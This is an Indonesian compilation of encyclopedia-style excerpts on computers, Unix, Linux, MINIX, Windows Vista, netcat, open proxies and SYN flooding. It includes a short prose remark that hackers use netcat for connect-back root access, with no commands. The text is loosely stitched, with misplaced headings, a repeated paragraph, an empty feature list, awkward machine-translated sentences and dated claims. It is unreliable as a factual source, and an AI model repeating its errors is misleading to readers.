PENDAHULUAN
Komputer adalah alat yang dipakai untuk mengolah data menurut prosedur yang telah dirumuskan. Kata computer semula dipergunakan untuk menggambarkan orang yang perkerjaannya melakukan perhitungan aritmatika, dengan atau tanpa alat bantu, tetapi arti kata ini kemudian dipindahkan kepada mesin itu sendiri. Asal mulanya, pengolahan informasi hampir eksklusif berhubungan dengan masalah aritmatika, tetapi komputer modern dipakai untuk banyak tugas yang tidak berhubungan dengan matematika.
Dalam definisi seperti itu terdapat alat seperti slide rule, jenis kalkulator mekanik mulai dari abakus dan seterusnya, sampai semua komputer elektronik yang kontemporer. Istilah lebih baik yang cocok untuk arti luas seperti “komputer” adalah “yang memproses informasi” atau “sistem pengolah informasi.”
Komputer
Sekalipun demikian, definisi di atas mencakup banyak alat khusus yang hanya bisa memperhitungkan satu atau beberapa fungsi. Ketika mempertimbangkan komputer modern, sifat mereka yang paling penting yang membedakan mereka dari alat menghitung yang lebih awal ialah bahwa, dengan pemrograman yang benar, semua komputer dapat mengemulasi sifat apa pun (meskipun barangkali dibatasi oleh kapasitas penyimpanan dan kecepatan yang berbeda), dan, memang dipercaya bahwa mesin sekarang bisa meniru alat perkomputeran yang akan kita ciptakan di masa depan (meskipun niscaya lebih lambat). Dalam suatu pengertian, batas kemampuan ini adalah tes yang berguna karena mengenali komputer “maksud umum” dari alat maksud istimewa yang lebih awal. Definisi dari “maksud umum” bisa diformulasikan ke dalam syarat bahwa suatu mesin harus dapat meniru Mesin Turing universal. Mesin yang mendapat definisi ini dikenal sebagai Turing-lengkap, dan yang pertama mereka muncul pada tahun 1940 di tengah kesibukan perkembangan di seluruh dunia. Lihat artikel sejarah perkomputeran untuk lebih banyak detail periode ini.
Komputer Benam
Pada sekitar 20 tahun terakhir, banyak alat rumah tangga, khususnya termasuk panel dari permainan video tetapi juga mencakup telepon genggam, perekam kaset video, PDA dan banyak sekali dalam rumahtangga, industri, otomotif, dan alat elektronik lain, semua berisi sirkuit elektronik yang seperti komputer yang memenuhi syarat Turing-lengkap di atas (dengan catatan bahwa program dari alat ini seringkali dibuat secara langsung di dalam chip ROM yang akan perlu diganti untuk mengubah program mesin). Komputer maksud khusus lainnya secara umum dikenal sebagai “mikrokontroler” atau “komputer benam” (embedded computer). Oleh karena itu, banyak yang membatasi definisi komputer kepada alat yang maksud pokoknya adalah pengolahan informasi, daripada menjadi bagian dari sistem yang lebih besar seperti telepon, oven mikrowave, atau pesawat terbang, dan bisa diubah untuk berbagai maksud oleh pemakai tanpa modifikasi fisik. Komputer kerangka utama, minikomputer, dan komputer pribadi (PC) adalah macam utama komputer yang mendapat definisi ini.
Bagaimana Komputer Bekerja
Saat teknologi yang dipakai pada komputer digital sudah berganti secara dramatis sejak komputer pertama pada tahun 1940-an (lihat Sejarah perangkat keras menghitung untuk lebih banyak detail), komputer kebanyakan masih menggunakan arsitektur Von Neumann, yang diusulkan di awal 1940-an oleh John von Neumann.
Arsitektur Von Neumann menggambarkan komputer dengan empat bagian utama: Unit Aritmatika dan Logis (ALU), unit kontrol, memori, dan alat masukan dan hasil (secara kolektif dinamakan I/O). Bagian ini dihubungkan oleh berkas kawat, “bus”
Di sistem ini, memori adalah urutan byte yang dinomori (seperti “sel” atau “lubang burung dara”), masing-masing berisi sepotong kecil informasi. Informasi ini mungkin menjadi perintah untuk mengatakan pada komputer apa yang harus dilakukan. Sel mungkin berisi data yang diperlukan komputer untuk melakukan suatu perintah. Setiap slot mungkin berisi salah satu, dan apa yang sekarang menjadi data mungkin saja kemudian menjadi perintah.
Memori menyimpan berbagai bentuk informasi sebagai angka biner. Informasi yang belum berbentuk biner akan dipecahkan (encoded) dengan sejumlah instruksi yang mengubahnya menjadi sebuah angka atau urutan angka-angka. Sebagai contoh: Huruf F disimpan sebagai angka desimal 70 (atau angka biner ) menggunakan salah satu metode pemecahan. Instruksi yang lebih kompleks bisa digunakan untuk menyimpan gambar, suara, video, dan berbagai macam informasi. Informasi yang bisa disimpan dalam satu sell dinamakan sebuah byte.
Secara umum, memori bisa ditulis kembali lebih jutaan kali – memori dapat diumpamakan sebagai papan tulis dan kapur yang dapat ditulis dan dihapus kembali, daripada buku tulis dengan pena yang tidak dapat dihapus.
Ukuran masing-masing sel, dan jumlah sel, berubah secara hebat dari komputer ke komputer, dan teknologi dalam pembuatan memori sudah berubah secara hebat – dari relay elektromekanik, ke tabung yang diisi dengan air raksa (dan kemudian pegas) di mana pulsa akustik terbentuk, sampai matriks magnet permanen, ke setiap transistor, ke sirkuit terpadu dengan jutaan transistor di atas satu chip silikon.
Kata “Komputer”
Selama bertahun-tahun sudah ada beberapa arti yang agak berbeda pada kata ‘komputer’, dan beberapa kata berbeda untuk hal kami sekarang biasanya disebut komputer.
Misalnya “computer” secara umum pernah dipergunakan untuk bermaksud orang memperkerjakan untuk melakukan perhitungan aritmatika, dengan atau tanpa mesin membantu. Menurut Barnhart Concise Dictionary of Etymology, kata tersebut digunakan dalam bahasa Inggris pada tahun 1646 sebagai kata bagi “orang yang menghitung” dan lalu menjelang 1897 juga untuk “alat hitung mekanis”. Selama Perang Dunia II kata tersebut menunjuk kepada para pekerja wanita AS dan Inggris yang pekerjaannya memperhitungkan jalan artileri perang besar dengan mesin seperti itu.
Charles Babbage mendesain salah satu mesin menghitung pertama disebut Mesin Analitikal, tetapi karena masalah teknologi tidak dibuat seumur hidupnya. Berbagai alat mesin yang sederhana seperti slide rule baik juga sudah menyebut komputer. Di beberapa kasus mereka diserahkan ke sebagai “komputer analog”, sewaktu mereka melambangkan nomor oleh continuous kuantitas-kuantitas fisik daripada di samping digit biner yang berlainan. Apa sekarang menyebut “komputer” saja secara umum pernah menyebut “komputer digital” untuk membedakan mereka dari alat lain ini (yang masih dipakai di bidang analog pengolahan tanda, misalnya).
In yang memikirkan kata lain untuk komputer, itu ialah harga mengamati bahwa di bahasa lain kata yang dipilih selalu tidak mempunyai arti harfiah sama sebagai kata Bahasa Inggris. Dalam Bahasa Perancis misalnya, kata ialah “ordinateur”, yang berarti kira-kira “organisator”, atau “memisahkan mesin”. Pada bahasa Spanyol digunakan kata “ordenador”, dengan arti sama, walaupun di beberapa negara mereka menggunakan anglicism computadora. Dalam Bahasa Italia, komputer ialah “calcolatore”, kalkulator, menekankannya computational menggunakan di balik yang logis seperti penyortiran. Dalam Bahasa Swedia, komputer dipanggil “dator” dari “data”. Atau paling tidak pada tahun 1950-an, mereka disebut “matematikmaskin” (mesin matematika). Dalam Bahasa Tionghoa, komputer dipanggil “dien nau” atau suatu “otak listrik”. Dalam Bahasa Inggris, kata lain dan frase sudah bekas, seperti “mesin pengolahan data”.
SOFTWARE
UNIXUnix atau UNIX adalah sebuah sistem operasi komputer yang dikembangkan oleh AT&T Bell Labs pada tahun 1960 dan 1970-an. UNIX didesain sebagai sistem operasi yang portable, multi-tasking dan multi-user. BSD adalah salah satu turunan (varian) Unix yang dikembangkan oleh Universitas California, Berkeley.
Pendahuluan
Sistem operasi Unix digunakan secara luas baik sebagai server atau workstation. Arsitektur Unix dan model client/server merupakan elemen yang paling penting dalam perkembangan internet dan mengubah proses komputasi secara terpusat dalam jaringan dari pada proses tunggal di komputer. Linux, merupakan sistem operasi yang diadopsi dari Unix dan tersedia secara bebas mendapat popularitas sebagai alternatif dari sistem operasi proprietary seperti Microsoft Windows
[sunting]Sejarah
[sunting]1960 dan 1970
Pada tahun 1960, Massachusetts Institute of Technology, AT&T Bell Labs, and General Electric bekerja dalam sebuah sistem operasi eksprimental yang disebut Multics (Multiplexed Information and Computing Service).
[sunting]Aplikasi
Banyak aplikasi-aplikasi dalam sistem operasi lain yang awalnya lahir dalam lingkungan sistem operasi Unix. Salah satu contoh aplikasi yang dimaksud misalnya adalah gnuplot.
[sunting]Unix Di Indonesia
Di Indonesia Unix digunakan sebagai Server aplikasi, produk yang beredar di pasaran antara lain IBM AIX, HP UX, Sun Solaris. Masing-masing produk ini umumnya memiliki pasar tersendiri seperti Sun Solaris yang digunakan pada operator telekomunikasi selular, HP UX pada manufaktur dan distribusi. Fungsi Unix sebagai workstation kurang populer mengingat harganya yang mahal.
[sunting]Jenis-jenis UNIX
LINUX
UNIX adalah sebuah sistem operasi yang dikembangkan oleh banyak pihak. Setiap pihak yang mengembangkan UNIX, menambahkan teknologi miliknya ke dalam UNIX, yang meskipun hal itu di luar standar, mampu menjadikan sistem operasi UNIX lebih kuat atau lebih andal. Tabel berikut menyebutkan beberapa jenis-jenis UNIX.
Linux (diucapkan ˈlɪnəks atau /ˈlɪnʊks/)[1] adalah nama yang diberikan kepada sistem operasi komputer bertipe Unix. Linux merupakan salah satu contoh hasil pengembangan perangkat lunak bebas dan sumber terbuka utama. Seperti perangkat lunak bebas dan sumber terbuka lainnya pada umumnya, kode sumber Linux dapat dimodifikasi, digunakan dan didistribusikan kembali secara bebas oleh siapapun.[2]
Nama "Linux" berasal dari nama kernelnya (kernel Linux), yang dibuat tahun 1991 oleh Linus Torvalds. Sistemnya, peralatan sistem dan pustakanya umumnya berasal dari sistem operasi GNU, yang diumumkan tahun 1983 oleh Richard Stallman. Kontribusi GNU adalah dasar dari munculnya nama alternatif GNU/Linux.[3]
Linux telah lama dikenal untuk penggunaannya di server, dan didukung oleh perusahaan-perusahaan komputer ternama seperti Dell, Hewlett-Packard, IBM, Novell, Oracle Corporation, Red Hat, dan Sun Microsystems. Linux digunakan sebagai sistem operasi di berbagai macam jenis perangkat keras komputer, termasuk komputer desktop, superkomputer,[4], dan sistem benam seperti pembaca buku elektronik, sistem permainan video (PlayStation 2, PlayStation 3 dan XBox[5]), telepon genggam dan router. Para pengamat teknologi informatika beranggapan kesuksesan Linux dikarenakan Linux tidak bergantung kepada vendor (vendor independence), biaya operasional yang rendah, dan kompatibilitas yang tinggi dibandingkan versi UNIX tak bebas, serta faktor keamanan dan kestabilannya yang tinggi dibandingkan dengan sistem operasi lainnya seperti Microsoft Windows. Ciri-ciri ini juga menjadi bukti atas keunggulan model pengembangan perangkat lunak sumber terbuka (opensource software).
Sistem operasi Linux yang dikenal dengan istilah distribusi Linux (Linux distribution) atau distro Linux umumnya sudah termasuk perangkat-perangkat lunak pendukung seperti server web, bahasa pemrograman, basisdata, tampilan desktop (desktop environment) (seperti GNOME dan KDE), dan paket aplikasi perkantoran (office suite) seperti OpenOffice.org, KOffice, Abiword, dan Gnumeric.
[sunting]
Sistem operasi Unix dikembangkan dan diimplementasikan pada tahun 1960-an dan pertama kali dirilis pada 1970. Faktor ketersediaannya dan kompatibilitasnya yang tinggi menyebabkannya dapat digunakan, disalin dan dimodifikasi secara luas oleh institusi-institusi akademis dan pada pebisnis.
Proyek GNU yang mulai pada 1984 memiliki tujuan untuk membuat sebuah sistem operasi yang kompatibel dengan Unix dan lengkap dan secara total terdiri atas perangkat lunak bebas.[6] Tahun 1985, Richard Stallman mendirikan Yayasan Perangkat Lunak Bebas dan mengembangkan Lisensi Publik Umum GNU (GNU General Public License atau GNU GPL). Kebanyakan program yang dibutuhkan oleh sebuah sistem operasi (seperti pustaka, kompiler, penyunting teks, shell Unix dan sistem jendela) diselesaikan pada awal tahun 1990-an, walaupun elemen-elemen tingkat rendah seperti device driver, jurik dan kernel masih belum selesai pada saat itu.[7] Linus Torvalds pernah berkata bahwa jika kernel GNU sudah tersedia pada saat itu (1991), dia tidak akan memutuskan untuk menulis versinya sendiri.[8]
MINIX
MINIX, sebuah sistem bertipe Unix yang ditujukan untuk penggunaan akademis dirilis oleh Andrew S. Tanenbaum pada tahun 1987. Kode sumber MINIX 1.0 tercantum dalam bukunya Operating Systems: Design and Implementation. Walaupun dapat secara mudah didapatkan, modifikasi dan pendistribusian ulang tidak diperbolehkan pada saat itu. Hak cipta dari kode sumbernya termasuk ke dalam hak cipta dari bukunya yang dipublikasikan oleh Prentice Hall. Sebagai tambahan, disain versi 16-bit dari MINIX kemudian tidak secara baik diadaptasikan kepada versi 32-bit dari arsitektur Intel 386 yang murah dan populer yang digunakan secara luas di komputer pribadi.
Tahun 1991, Torvalds mulai bekerja untuk membuat versi non-komersial pengganti MINIX sewaktu ia belajar di Universitas Helsinki.[9] Hasil kerjaannya itu yang kemudian akan menjadi kernel Linux.
Pada tahun 1992, Tanembaum menulis sebuah artikel di Usenet, mengklaim bahwa Linux sudah ketinggalan zaman. Dalam artikelnya, ia mengkritik Linux sebagai sebuah sistem operasi dengan rancangan monolitik dan terlalu terpaku dengan arsitektur x86 sehingga tidak bersifat portable, di mana digambarkannya sebagai sebuah "kesalahan mendasar".[10] Tanenbaum menyarankan bahwa mereka yang menginginkan sebuah sistem operasi modern harus melihat kepada sebuah rancangan yang berdasarkan kepada model mikrokernel. Tulisan tersebut menekankan tanggung jawab Torvalds yang berujung kepada sebuah debat tentang rancangan kernel monolitik dan mikrokernel.[10]
Sekarang ini Linux telah digunakan di berbagai domain, dari sistem benam[11] sampai superkomputer,[12] dan telah mempunyai posisi yang aman dalam instalasi server web dengan aplikasi LAMP-nya yang populer.[13] Pengembangan kernel Linux masih dilanjutkan oleh Torvalds, sementara Stallman mengepalai Yayasan Perangkat Lunak Bebas yang mendukung pengembangan komponen GNU. Selain itu, banyak individu dan perusahaan yang mengembangkan komponen non-GNU. Komunitas Linux menggabungkan dan mendistribusikan kernel, komponen GNU dan non-GNU dengan perangkat lunak manajemen paket dalam bentuk distribusi Linux.
[sunting]Pengucapan
Pada tahun 1992, Torvalds menjelaskan bagaimana ia mengeja kata Linux:
“ 'li' dieja dengan bunyi [ee] pendek, 'nux' juga pendek, non-diftong, seperti dalam pUt. Linux hanya merupakan nama kerja untuk sesuatu, dan karena saya menulisnya untuk menggantikan minix di sistemku, hasilnya adalah apa adanya... linus' minix menjadi linux. ”
Torvalds membuat sebuah contoh audio yang berisi suara bagaimana pengejaannya dalam bahasa Inggris dan Swedia.[14][15] Tetapi, sebuah wawancara dari dokumentasi tahun 2001 Revolution OS mengindikasikan bahwa cara pengejaannya sedikit berubah.[16]
Dalam bahasa Inggris, banyak orang cenderung mengeja Linux sebagai [ˈlɪnʊks] atau [ˈlɪnəks].
[sunting]Disain
Linux merupakan sistem operasi bertipe Unix modular. Linux memiliki banyak disain yang berasal dari disain dasar Unix yang dikembangkan dalam kurun waktu 1970-an hingga 1980-an. Linux menggunakan sebuah kernel monolitik, kernel Linux yang menangani kontrol proses, jaringan, periferal dan pengaksesan sistem berkas. Device driver telah terintegrasi ke dalam kernel.
Banyak fungsi-fungsi tingkat tinggi di Linux ditangani oleh proyek-proyek terpisah yang berintegrasi dengan kernel. Userland GNU merupakan sebuah bagian penting dari sistem Linux yang menyediakan shell dan peralatan-peralatan yang menangani banyak fungsi-fungsi dasar sistem operasi. Di atas kernel, peralatan-peralatan ini membentuk sebuah sistem Linux lengkap dengan sebuah antarmuka pengguna grafis yang dapat digunakan, umumnya berjalan di atas X Window System.
[sunting]Antarmuka pengguna
Lihat pula: Antarmuka pengguna
Linux dapat dikendalikan oleh satu atau lebih antarmuka baris perintah (command line interface atau CLI) berbasis teks, antarmuka pengguna grafis (graphical user interface atau GUI, yang umumnya merupakan konfigurasi bawaan untuk versi desktop).
Pada komputer meja, GNOME, KDE dan Xfce merupakan antarmuka pengguna yang paling populer,[17] walaupun terdapat sejumlah varian antarmuka pengguna. Antarmuka pengguna yang paling populer berjalan di atas X Window System (X), yang menyediakan transparansi jaringan yang memperolehkan sebuah aplikasi grafis berjalan di atas satu mesin tetapi ditampilkan dan dikontrol di mesin yang lain.
GUI yang lain memiliki X window manager seperti FVWM, Enlightenment, Fluxbox dan Window Maker. Manajer jendela menyediakan kontrol untuk penempatan dan penampilan dari jendela-jendela aplikasi individual serta interaksi dengan sistem jendela X.
Sebuah sistem Linux umumnya menyediakan sebuah antarmuka baris perintah lewat sebuah shell, yang merupakan cara tradisional untuk berinteraksi dengan sebuah sistem Unix. Sebuah distro Linux yang dikhususkan untuk lingkungan peladen mungkin hanya memiliki CLI sebagai satu-satunya antarmuka. Sebuah sistem yang tidak memiliki monitor hanya dapat dikontrol melalui baris perintah lewat protokol seperti SSH atau telnet.
Kebanyakan komponen tingkat rendah Linux, termasuk GNU Userland, menggunakan CLI secara ekslusif. CLI cocok untuk digunakan pada lingkungan otomasi tugas-tugas yang repetitif atau tertunda, dan menyediakan komunikasi inter-proses yang sangat sederhana. Sebuah program emulator terminal grafis sering digunakan untuk mengakses CLI dari sebuah Linux desktop.
"GNU/Linux"
Lihat Kontroversi Penamaan GNU/Linux
GNU adalah singkatan dari GNU's Not Unix.
Disebabkan utiliti-utiliti dari proyek sistem operasi bebas GNU - tanpa ini sistem Linux tidak akan menyerupai sistem Unix dalam perspektif pengguna - Richard Stallman dari GNU/FSF memohon agar kombinasi sistem (proyek GNU dan kernel Linux), disebut sebagai "GNU/Linux". Pengguna distribusi Linux dari proyek Debian lebih cenderung menggunakan nama tersebut. Kebanyakan pengguna lebih mudah menggunakan istilah "Linux".
Windows Vista adalah versi terbaru Microsoft Windows, sistem operasi berbasis grafis dari Microsoft yang digunakan pada komputer pribadi (PC), baik untuk pengguna rumahan maupun bisnis, pada komputer laptop, maupun media center.
Sebelum diumumkan dengan nama Windows Vista pada 22 Juli 2005, sistem operasi ini lebih dikenal dengan codename Longhorn (berasal dari nama Longhorn Saloon, sebuah bar terkenal di Whistler, British Columbia, Kanada).
Microsoft meluncurkan Windows Vista pada 8 November 2006 untuk pengguna bisnis, dan 30 Januari 2007 untuk pengguna rumahan. Dengan demikian, peluncuran Windows Vista ini berjarak lebih dari lima tahun sejak peluncuran Windows XP pada 25 Oktober 2001.
Microsoft pertama kalinya mengumumkan "Longhorn" pada bulan Juli 2001, bahkan sebelum peluncuran Windows XP pada bulan Oktober tahun yang sama. Pada awalnya, Longhorn diharapkan untuk mulai dijual pada kisaran tahun 2003 sebagai batu loncatan di antara Windows XP dan "Blackcomb" (sekarang dikenal sebagai "Windows 7"). Secara bertahap, "Longhorn" nyatanya dibangun dengan banyak fitur-fitur dan teknologi baru dari "Blackcomb", sehingga tanggal peluncurannya pun berkali-kali diundur. Microsoft kemudian mengumumkan pada 27 Agustus 2004 bahwa Perusahaan itu melakukan perubahan yang signifikan. Pembangunan "Longhorn" diulang kembali dan didasarkan pada basis program Windows Server 2003. Beberapa fitur yang sebelumnya diumumkan, seperti WinFS, pun dibatalkan.
Setelah "Longhorn" dinamai menjadi Windows Vista, sebuah uji-beta program dimulai, melibatkan ratusan ribu sukarelawan dan perusahaan. Pada September 2005, Microsoft mulai meluncurkan Community Technology Previews (CTP) secara reguler bagi para penguji-beta. Rilis yang pertama adalah build 5219, didistribusikan bagi undangan yang hadir pada Microsoft Professional Developers Conference (PDC) 2005, dan juga dirilis bagi para penguji Microsoft Beta dan para pelanggan MSDN.
Dalam CTP-CTP berikutnya, Microsoft telah memperkenalkan banyak rencana-rencana fitur untuk produk finalnya, seperti sejumlah perubahan untuk antarmuka pengguna, yang didasarkan dari usulan balik dari para penguji-beta.
Windows Vista dianggap telah memiliki fitur yang lengkap dengan peluncuran build 5308 CRT, yang dirilis pada 22 Februari 2006. Pekerjaan yang menunggu para programer Microsoft hingga tanggal akan dirilisnya versi final nanti cenderung difokuskan pada stabilitas, kinerja, kompatibilitas aplikasi dan driver, serta dokumentasi.
James Allchin dalam sebuah wawancara menyatakan bahwa tidak akan ada versi "Release Candidate" (RC) seperti yang dilakukan pada versi-versi Windows yang sebelumnya. Microsoft sebaliknya hanya akan mengirimkan CTP hingga produk tersebut siap dipasarkan. Hanya saja dalam peluncuran Windows Vista Beta 2 bagi para penguji pada 23 Mei 2006, dan untuk umum pada 7 Juni 2006 melalui Microsoft's Customer Preview Program (bisa diunduh langsung ataupun dengan memesan DVD), Microsoft memberikan petunjuk bahwa akan ada release candidate untuk Windows Vista dengan menjanjikan sebuah Release Candidate 1 DVD kit untuk yang memesan DVD Beta 2.
Dalam roadmap Microsoft tampaknya rencana untuk tanggal rilis ke pabrikan adalah pada atau sebelum 25 Oktober 2006.
[sunting]Fitur-fitur yang baru dan diperbaharui
WINDOWS VISTA
Windows Vista memiliki daftar panjang untuk ratusan fitur-fitur baru, fitur-fitur yang diubahkan, dan fitur-fitur yang ditingkatkan kemampuannya. Pada saat ini daftar fitur-fitur tersebut belum dipublikasikan secara lengkap oleh Microsoft. Namun demikian, berbagai fitur yang akan dimasukkan ke dalam Windows Vista tersebut sudah mulai diperkenalkan melalui beberapa publikasi.
[sunting]Fitur-Fitur End-User
Windows Aero: desain baru antarmuka pengguna, singkatan dari Authentic, Energetic, Reflective, and Open. Antarmuka baru ini dimaksudkan agar lebih estetis dan bersih ketimbang tantarmuka Windows sebelumnya, termasuk jendela-jendela transparan, animasi, dan tampilan yang bagus.
Windows Shell: Windows shell yang baru ini berbeda sekali dengan Windows XP. Sebagai contoh, Start Menu yang telah diubah, bahkan kata "Start" pun telah digantikan dengan tombol Windows "Pearl" biru yang baru.
Fasilitas Pencarian (Quick Search):
Windows Sidebar:
Internet Explorer 7+:
Windows Media Player 11:
Windows Media Center:
Windows Live Show :
User Account Control:
Windows Firewall With advanced security:
Windows Defender:
Windows Mail:
Windows Update:
Parental Control:
Windows Sideshow:
Speech recognition:
New Fonts:
Games:
Windows Calendar:
Windows Photo Gallery:
Windows DVD Maker:
Windows Collaboration:
SuperFetch:
ReadyBoost:
ReadyDrive:
Touchscreen:
Problem Reports and Solutions:
Virtual Folder:
[sunting]Teknologi Inti
Windows Vista dimaksudkan untuk diluncurkan sebagai produk berbasis-teknologi, sebagai sistem yang solid yang mencakup teknologi-teknologi baru tingkat tinggi. Banyak di antaranya merupakan teknologi yang berkaitan dengan bagaimana sistem berfungsi, yang bekerja di belakang layar dan tidak terlihat oleh pengguna akhir.
Pembangunan ulang seluruh arsitektur audio, print, tampilan layar (display), dan stack jaringan
Protokol IPv6 yang juga bekerja bersama dengan IPv4
Struktur keamanan baru, termasuk BitLocker Drive Encryption
Peningkatan kemampuan memory manager dan process scheduler
System services dimasukkan sebagai sesi terpisah dan terisolasi, sementara proses User sebagai sesi yang berbeda.
Address Space Layout Randomization (ASLR) untuk mencegah serangan Return-to-libc buffer overflow.
Kernel Transaction Manager yang baru memungkinkan operasi transaksi atom melintasi berbagai obyek yang berbeda, terutama sekali sistem file (Transactional NTFS) dan operasi registry.
Deadlock Detection Technology merupakan teknologi baru yang akan melakukan pengecekan atas kondisi-kondisi deadlock (kebuntuan sistem) untuk pelaporan error Windows.
[sunting]Teknologi bagi Developer
.NET Framework 3.0, sebelumnya WinFX, merupakan sebuah set teknologi yang juga ditujukan untuk tersedia bagi Windows XP dan Windows Server 2003. Oleh karenanya teknologi ini bukan merupakan teknologi yang eksklusi hanya untuk Vista, tetapi dirancang selama kurun waktu pembangunan Vista. Alasan agar teknologi ini lebih mudah diperkenalkan ke para developer dan end-user, mungkin menjadi dasar mengapa Microsoft melakukan backport teknologi bagi sistem operasi yang sebelumnya.
Microsoft menyebut teknologi kunci yang baru dalam versi Windows ini sebagai "The Pillars of Vista" (Pilar-Pilar Vista).
Presentasi
Windows Presentation Foundation atau WPF, sebelumnya diberi nama-kode Avalon; adalah sebuah sub-sistem antarmuka pengguna yang baru dan merupakan kerangka-kerja yang didasarkan pada teknologi Direct3D (DirectX) dan grafik vektor-kerja sama antara perangkat keras komputer grafik 3D dengan teknologi Direct3D. Lihat juga Windows Graphics Foundation.
Komunikasi
Windows Communication Foundation atau WCF, sebelumnya diberi nama-kode Indigo; adalah sistem komunikasi berorientasi-servis (service-oriented messaging system) yang mengijinkan program untuk berinteroperasi secara lokal maupun remote mirip seperti service jejaring (web).
Workflow
Windows Workflow Foundation or WF; pertama kali diumumkan pada Agustus 2005, akan mengijinkan transaksi otomatisasi dan terintegrasi dengan menggunakan arus-kerja (workflows).
Selain itu juga ada pembangunan API (Application Program Interface) baru signikan di dalam inti sistem operasi, khususnya penambahan .NET Framework, pembangunan benar-benar baru bagi arsitektur audio, jaringan, pencetakan (print), dan antarmuka video, perubahan besar dalam infrastruktur keamanan, peningkatan bagi instalasi program aplikasi ("ClickOnce" dan Windows Installer 4.0), model baru untuk device driver ("Windows Driver Foundation"), Transactional NTFS, serta pembaruan besar-besaran bagi banyak sub-sistem inti seperti Winlogon dan CAPI.
Ada beberapa isu bagi delevoper perangkat lunak dalam menggunakan API grafik di Vista. Games maupun program-program yang dibangun di atas Direct3D Versi 10 milik Vista, tidak akan bekerja di Windows versi sebelumnya, karena Direct3D 10 tidak kompatibel dengan Direct3D 9.
[sunting]Fitur XP yang dihilangkan
Beberapa fitur dan komponen Windows XP yang terkenal juga telah digantikan ataupun dihilangkan dari Windows Vista. Mungkin yang paling terlihat signifikan adalah penghilangan Windows Messenger dan MSN Explorer, dan penggantian NetMeeting dengan Windows Collaboration. Windows Vista juga tidak memasukkan tema-visual (visual theme) Windows XP "Luna". Fitur "Hardware profiles" juga telah dihilangkan, diikuti dengan penarikan dukungan untuk teknologi motherboard lawas seperti EISA bus dan APM.
[sunting]Fitur-fitur yang ditunda/dibatalkan
WinFS adalah nama-kode untuk sebuah sistem file baru dengan sifat relational database yang dibangun di atas sistem NTFS dan SQL Server 2005. Pada bulan Agustus 2006, Microsoft mengumumkan bahwa WinFS batal dimasukkan dalam Windows Vista. Hal ini dikarenakan belum selesainya pengembangan teknologi ini. Microsoft telah mengerjakan teknologi ini sejak pertengahan tahun 1990an. Sedianya, Microsoft akan meluncurkan WinFS secara terpisah dari Vista, tapi pada 23 Juni 2006 kembali diumumkan bahwa Microsoft memutuskan untuk mengintegrasikan beberapa dari fitur yang telah dikembangkan ini dalam versi selanjutnya dari ADO.NET dan SQL Server, secara efektif sekaligus membatalkan proyek WinFS.
Sehubungan dengan isu penjadwalan, Windows PowerShell, dengan nama-kode Monad juga tidak akan dimasukkan dalam Windows Vista. Namun demikian, Microsoft telah mengumumkan bahwa fitur ini akan tersedia untuk diunduh secara terpisah dalam kuartal keempat 2006.
Arsitektur keamanan Next-Generation Secure Computing Base juga diabaikan dari Windows Vista, dikarenakan masih sedikitnya developer pihak-ketiga untuk mendukung sistem ini.
Dukungan untuk Intel Extensible Firmware Interface (semacam sistem BIOS baru) juga dibatalkan karena sedikitnya dukungan untuk komputer desktop.
PC-to-PC Sync, sebuah teknologi Peer-to-peer untuk sinkronisasi folder antar komputer-komputer yang menjalankan Vista, juga dibatalkan karena masalah kualitas. Kemungkinan teknologi ini tetap akan dikembangkan di masa depan.
[sunting]Antarmuka grafis
Antarmuka baru Vista, Windows Aero, dibangun di atas sebuah mesin baru yang bernama Desktop Window Manager. Windows Aero, juga dikenal sebagai Aero Glass, menambahkan dukungan untuk grafik 3D (dikenal sebagai Flip 3D), jendela transparan, animasi, dan efek visual lainnya. Windows Aero membutuhkan kartu grafis high-end dan kapasitas perangkat keras seperti:
memori grafis 64MB direkomendasikan untuk set layar 1024x768, dan 128MB untuk 1600x1200+.
minimal 32 bit per pixel
3D hardware accelleration yang mendukung DirectX 9.0
memori dengan lebar pita (bandwidth) direkomendasikan 2GB/s
mampu menggambar ~1.5 juta segitiga/detik, dengan satu jendela hingga ~150 segitiga
mendukung driver Windows Display Driver Model (WDDM).
Vista juga menawarkan model Aero lainnya:
Mode Standard, adalah varian Windows Aero tanpa tranparan, animasi, dan efek grafis lainnya seperti Flip 3D.
Mode Windows Classic, juga tersedia sebagai antarmuka yang paling dasar. Classic memiliki tampilan yang mirip dengan Windows 2000 dan tidak menggunakan Desktop Composition Engine yang baru. Classic memerlukan driver-driver Windows XP Display Driver Model (XPDM) atau WDDM dan kartu grafis yang mendukung Windows 2000.
NETCAT
netcat adalah sebuah utiliti tool yang digunakan untuk berbagai hal yang berkaitan dengan protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paket paket UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6. Tidak seperti telnet, script nc memisahkan pesan error ke standar error daripada ke standar output, sedangkan telnet mengirimkan output dan error ke standar output yang sama.
Biasanya netcat ini digunakan oleh para hacker atau peretas untuk melakukan connect back pada sistem target agar hacker mendapatkan akses root melalui port yg telah di tentukan oleh hacker tersebut.
NetMap adalah Network Management System (NMS) yang didesain untuk memonitor kinerja (performance) dan ketersediaan (availability) dari perangkat sistem komputer atau perangkat jaringan
NetMap adalah Network Management System (NMS) yang didesain untuk memonitor kinerja (performance) dan ketersediaan (availability) dari perangkat sistem komputer atau perangkat jaringan
PROXY
Open proxy (proxy terbuka) adalah sebuah proxy server yang dapat diakses oleh siapapun lewat internet. Umumnya sebuah peladen proxy melayani pengguna dalam suatu jaringan tertutup dengan melewatkan layanan data seperti DNS atau halaman web untuk mengurangi dan mengontrol lebar pita yang digunakan. Dengan open proxy, pengguna manapun di internet dapat menggunakan layanan ini.
FLOOADING
SYN flooding attack adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada salah satu jenis serangan Denial-of-service yang menggunakan paket-paket SYN.
